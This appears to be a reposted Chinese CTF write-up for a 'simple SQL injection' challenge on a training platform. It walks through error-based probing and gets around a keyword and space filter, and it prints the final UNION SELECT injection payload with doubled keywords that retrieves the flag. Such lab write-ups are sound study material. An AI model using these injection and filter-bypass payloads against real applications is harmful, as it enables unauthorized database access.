Web简单的SQL注入
来源:互联网 发布:崔万志淘宝店 编辑:程序博客网 时间:2024/05/20 06:36
实验吧链接: http://ctf5.shiyanbar.com/423/web/
解题思路:研究了好久,看了writeup才知道
1)在文本框输入1,提交,链接变成id=1
2)在文件框输入1‘,提交,报错,判断存在注入。
3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。
4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag from flag where ‘t’=’t
执行后报错:heck the manual that corresponds to your MySQL server version for the right syntax to use near ‘flag flag ‘t’=’t” at line 1
分析:根据错误信息发现只有变量了,其他的关键字都被过滤了。
5)把关键字写2遍提交,发现如下报错: corresponds to your MySQL server version for the right syntax to use near ‘unionselectflag fromflag where’t’=’t” at line 1
分析:发现空格被过滤了
6))使用+号在空格之前连接:
http://ctf5.shiyanbar.com/423/web/?id=1 ‘+unionunion +selectselect +flag+fromfrom +flag+wherewhere+’t’=’t
得到KEY:flag{xxxxxx}
0 0
- Web简单的SQL注入
- CTF Web简单的SQL注入
- 简单的sql注入
- 实验吧web之简单的sql注入1
- 实验吧ctf-web题:简单的sql注入
- 实验吧WEB--简单的sql注入之3
- 一个简单的SQL注入
- 简单的sql注入,安全第一
- 简单的SQL注入攻击
- 简单的sql注入WP
- 防止sql注入的简单方法
- 简单的ASP.net防SQL注入
- 防止sql注入的简单方法
- 简单的ASP.net防SQL注入
- 简单的ASP.net防SQL注入
- 简单的ASP.net防SQL注入
- 所谓最简单的SQL注入
- 一个简单的SQL注入攻击
- C++STL全排列的简单实现
- 完成SSH项目 -- 实现dao层
- Eclipse和PyDev搭建完美Python开发环境(Windows篇)
- HLS(HTTP Live Streaming)协议之m3u8文件生成方式
- hdfs ACL对文件夹实现权限访问控制
- Web简单的SQL注入
- 389 find the difference
- MyEclipse工程迁移到Eclipse遇到的问题
- 何为网页三剑客
- 打开网页的时候出现正在检测代理服…
- Oracle10g 安装及基本命令
- oracle 分页视频
- 关于桌面任务栏没有返回桌面的图标
- java学习心得
